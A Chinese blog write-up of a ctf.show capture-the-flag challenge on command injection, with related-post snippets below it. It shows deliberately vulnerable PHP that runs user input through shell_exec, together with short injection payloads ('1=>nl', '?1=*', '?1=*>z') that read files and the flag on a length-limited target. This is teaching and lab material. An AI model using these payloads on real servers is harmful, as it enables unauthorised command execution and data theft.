命令注入漏洞

原创 已于 2025-01-28 19:35:33 修改 · 334 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #linux

于 2024-11-25 21:27:20 首次发布

一、靶场:ctf.show

二、漏洞代码:

<?php
show_source(__FILE__);
error_reporting(0);
if(strlen($_GET[1])<4){
     echo shell_exec($_GET[1]);
}
else{
     echo "hack!!!";
}
?>

三、分析:将命令长度限制在了4,可以通过nl命令打印文件内容

根据ls得到目录下文件列表

可以通过linux命令 >  用于写入内容到一个文件中(linux中 > 前为空会根据 > 后的文件名创建一个新文件或将该文件内容清空),第一次写入空内容:1=>nl

构造完毕,利用通配符 * 将该目录下所有文件名作为linux指令执行:?1=*

查看源代码:

 1	<?php
       
     2	$flag = 'ctfshow{a94841a6-abdb-45c7-a96d-8118d125176a}';
       
     3	?>
     4	<?php
     5	show_source(__FILE__);
     6	error_reporting(0);
     7	if(strlen($_GET[1])<4){
     8	     echo shell_exec($_GET[1]);
     9	}
    10	else{
    11	     echo "hack!!!";
    12	}
    13	?>
    14	//by Firebasky

两个文件内容已经被nl正确按行顺序打印

二、linux输出重定向符号  >  的通常用法

url中输入?1=*>z,将 * 对应的命令输出结果重定向到z文件,由于没有文件后缀,默认访问直接可以下载,文件内容即 * 的输出结果

6位可控字符下的任意命令执行————解题思路
weixin_45425107的博客
07-14 727
前段时间的腾讯犀牛鸟,说好七字符,然后出题人忘记<号是啥意思了= = 本菜鸡通过队里的大佬和其他大佬的博客,大概摸透后将流程放在了笔记里。整理时感觉有点可惜,干脆水一篇博客,自以为已经说的很详细了 话不多说,直接上代码 <?php show_source(__FILE__);#高亮 if(strlen($_GET[1])<7){#如果1的长度<7 echo shell_exec($_GET[1]);#任意shell命令 } ?> flag在上级目录的key文件夹中,此文件
Cherry Studio 命令注入漏洞
最新发布
murphysec的博客
08-13 553
Cherry Studio存在高危命令注入漏洞(CVE-2025-54074),影响版本[1.2.5, 1.5.2)。该漏洞因MCP服务器认证流程中,redirectToAuthorization函数将未校验的授权端点URL直接传递给open函数,导致恶意URL可触发系统命令执行。修复版本1.5.2通过sanitizeUrl过滤非法协议及危险字符阻断攻击,建议用户升级至1.5.2+,并避免连接不受信任的MCP服务器。
ctfshow [nl]难了
weixin_52033041的博客
10-10 998
源码: <?php show_source(__FILE__); error_reporting(0); if(strlen($_GET[1])<4){ echo shell_exec($_GET[1]); } else{ echo "hack!!!"; } ?> 传入一个1,并执行1,并且1的长度不能超过4,最多三个 命令组装 会获得两个文件,然后使用*执行 会获得hello 此时*等于echo hello 此题提示nl,并且长度不超过四个 >nl,正
命令执行漏洞
qq_48904485的博客
03-21 2726
一、命令执行介绍 1、命令执行漏洞原理 命令执行漏洞定义:Web应用程序接收用户输入,拼接到要执行的系统命令中执行。 产生原因: 1、用户输入未过滤或净化; 2、拼接到系统命令中执行。 2、PHP下命令执行函数 在PHP中具有执行系统命令功能的函数如下: 1、system 2、exec 3、shell_exec 4、passthru 5、popen 6、proc_popen 7、`反引号 8、ob_start 9、mail函数+LD_PRELOAD执行系统命令 使用示例: L
PHP一些不一样的思路
anan2175的博客
05-31 433
大多数来自p牛 SQL注入(left join) 源代码 <?php $link = mysqli_connect('localhost', 'root', 'root'); mysqli_select_db($link, 'code'); $table = addslashes($_GET['table']); $sql = "UPDATE `{$table}` ...
精选资源
openssh-9.6.tar.gz版本,最新版本修复openssh命令注入漏洞
01-17
openssh-9.6.tar.gz版本,最新版本修复openssh命令注入漏洞,OpenSSH是使用SSH协议进行远程登录的首要连接工具。它对所有流量进行加密,以消除窃听、连接劫持和其他攻击。此外,OpenSSH提供了一大套安全隧道功能、几...
【网络安全漏洞挖掘之命令注入漏洞解析
anquan2233的博客
07-10 2308
Atlassian Bitbucket Server 和 Data Center 是 Atlassian 推出的一款现代化代码协作平台,支持代码审查、分支权限管理、CICD 等功能。受影响的Bitbucket Server 和 Data Center版本存在使用环境变量的命令注入漏洞,具有控制其用户名权限的攻击者可以在系统上执行任意命令
Web安全基础:命令注入漏洞
HackYourself的博客
12-26 1503
命令注入漏洞(Command Injection Vulnerability)是一种常见的安全漏洞,攻击者可以通过向应用程序传递恶意命令来操控系统的底层操作系统,从而执行未授权的操作。该漏洞通常出现在应用程序允许用户输入数据并将其传递给操作系统进行执行时。如果应用程序没有对用户输入进行适当的验证和过滤,攻击者可以在输入中嵌入恶意命令,从而使其在目标系统上执行。
有限字符下的任意命令执行总结
blue_fantasy的博客
01-10 1765
Text. 因为网上已经有很多大牛写过类似的文章了,所以本篇文章是一个总结梳理学习。 15位可控字符下的命令执行 <?php highlight_file(__FILE__); if(strlen($_GET[1])<15){ echo strlen($_GET[1]); echo shell_exec($_GET[1]); }else{ exit('too long'); } 因为只能传入14个字符,但是没有限制命令执行的次数,所以我们的思想可以通过Linux
详解文件包含漏洞
LYJ20010728的博客
05-28 1408
详解文件包含漏洞什么是文件包含文件包含漏洞成因php引发文件包含漏洞的四个函数文件包含漏洞的类型本地文件包含无任何限制限制包含文件的后缀名Session文件包含漏洞 什么是文件包含 为了更好地使用代码的重用性,引入了文件包含函数,通过文件包含函数将文件包含进来,直接使用包含文件的代码,简单点来说就是一个文件里面包含另外一个或多个文件 文件包含漏洞成因 文件包含函数加载的参数没有经过过滤或者严格的定义,可以被用户控制,包含其他恶意文件,导致了执行了非预期的代码 例如:$_GET['filename']没
7位可控字符下的任意命令执行
大方子
11-02 5282
题目源码: <?php highlight_file(__FILE__); if(strlen($_GET[1]<7)){ echo strlen($_GET[1]); echo '<hr/>'; echo shell_exec($_GET[1]); }else{ exit('too long'); } ?> 预备知识: ...
php调试检查内部代码函数show_source(),highlight_string(),highlight_file()
tutuwanc的博客
12-05 483
【代码】php调试检查内部代码函数show_source(),highlight_string(),highlight_file()
php showsource,showsource.php
weixin_42172972的博客
03-13 418
$cache_time=10;$OJ_CACHE_SHARE=false;require_once('./include/cache_start.php');require_once('./include/db_info.inc.php');require_once('./include/setlang.php');$view_title= "Source Code";require_once("...
CTF中字符长度限制下的命令执行 rce(7字符5字符4字符)汇总
热门推荐
Love&Share
10-21 2万+
七字符rce 源码 <?php highlight_file(__FILE__); if(strlen($_GET[1]<7)){ echo strlen($_GET[1]); echo '<hr/>'; echo shell_exec($_GET[1]); }else{ exit('too long'); } ?> #写入语句 <?php eval($_GET[1]); #base64编码后 PD9waHAgZXZhbCgkX0dFV
ctfshow web
2301_81040377的博客
06-07 886
浏览器内部使用32位带符号的整数,来储存推迟执行的时间。这意味着setTimeout最多只能推迟执行2147483647毫秒(24.8天)超过这个时间会发生溢出。只要让其溢出就会回显flag的内容。
【CTF Web】CTFShow 获得百分之百的快乐 Writeup(RCE+Linux命令+代码审计)
HEX9CF的技术博客
06-01 933
3阿呆开发了自己的博客系统,准备对欺负他的大佬口吐芬芳。
命令注入漏洞原理
03-26
好的,我现在需要回答用户关于命令注入漏洞的工作原理、形成原因及利用机制的问题。首先,我应该回顾用户提供的引用资料,提取关键信息,并组织成结构清晰的回答。 首先,用户提到的四个引用中,引用[3]详细解释了...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值